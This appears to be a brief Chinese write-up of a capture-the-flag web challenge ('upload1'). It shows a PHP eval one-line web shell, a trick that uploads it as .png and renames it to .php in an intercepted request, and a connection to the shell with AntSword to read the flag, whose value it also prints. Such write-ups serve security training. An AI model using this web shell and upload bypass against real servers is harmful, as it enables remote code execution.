题目:打开链接,先上传一个php文件试试所以,我们新建一个1.txt,写入php一句话: <?php @eval($_REQUEST[‘c’]);?>然后修改文件后缀为.png
上传该文件并抓包,修改filename后缀为.php得到upload:upload/1596870603.1.php,打开成功利用中国蚁剑链接,密码即为刚刚所创的png格式的php文件里的c连接成功,打开html文件下的flag.php即可得到flag$flag=“cyberpeace{e54061244aa29c17a76089dfe7ab9bc4}”
攻防世界we进阶区之upload1
最新推荐文章于 2020-08-19 15:15:43 发布